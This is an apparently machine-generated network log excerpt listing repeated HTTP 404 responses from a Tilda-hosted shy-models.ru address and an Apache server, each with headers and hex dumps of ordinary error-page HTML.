Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=LXfcFecsr3O3Ti2j3lVZ; Domain=.shy-models.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:22:25 GMTDate: Mon, 27 May 2024 10:22:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=GqnXXu3LgBBewU80pyEN; Domain=.shy-models.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:22:28 GMTDate: Mon, 27 May 2024 10:22:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=531fzAP8F7U8q9adsI66; Domain=.shy-models.ru; HttpOnly; Path=/; Expires=Tue, 27-May-2025 10:22:31 GMTDate: Mon, 27 May 2024 10:22:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:22:51 GMTServer: ApacheLast-Modified: Thu, 28 Dec 2023 09:40:51 GMTETag: "500c-60d8eb618ba1d"Accept-Ranges: bytesContent-Length: 20492Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 38 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 33 46 33 46 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 32 2e 35 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 75 63 69 64 61 20 47 72 61 6e 64 65 27 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 53 61 6e 73 2d 53 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 2c 74 64 2c 74 68 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:22:54 GMTServer: ApacheLast-Modified: Thu, 28 Dec 2023 09:40:51 GMTETag: "500c-60d8eb618ba1d"Accept-Ranges: bytesContent-Length: 20492Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 38 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 33 46 33 46 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 32 2e 35 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 75 63 69 64 61 20 47 72 61 6e 64 65 27 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 53 61 6e 73 2d 53 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 2c 74 64 2c 74 68 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:22:56 GMTServer: ApacheLast-Modified: Thu, 28 Dec 2023 09:40:51 GMTETag: "500c-60d8eb618ba1d"Accept-Ranges: bytesContent-Length: 20492Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 38 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 33 46 33 46 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 32 2e 35 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 75 63 69 64 61 20 47 72 61 6e 64 65 27 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 53 61 6e 73 2d 53 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 2c 74 64 2c 74 68 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:22:56 GMTServer: ApacheLast-Modified: Thu, 28 Dec 2023 09:40:51 GMTETag: "500c-60d8eb618ba1d"Accept-Ranges: bytesContent-Length: 20492Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 38 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 33 46 33 46 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 32 2e 35 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 75 63 69 64 61 20 47 72 61 6e 64 65 27 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 53 61 6e 73 2d 53 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 2c 74 64 2c 74 68 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:22:59 GMTServer: ApacheLast-Modified: Thu, 28 Dec 2023 09:40:51 GMTETag: "500c-60d8eb618ba1d"Accept-Ranges: bytesContent-Length: 20492Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 2d 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2e 2e 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0d 0a 0d 0a 09 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 74 6d 6c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 38 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 33 46 33 46 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 32 2e 35 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 4c 75 63 69 64 61 20 47 72 61 6e 64 65 27 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 53 61 6e 73 2d 53 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 2c 74 64 2c 74 68 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65
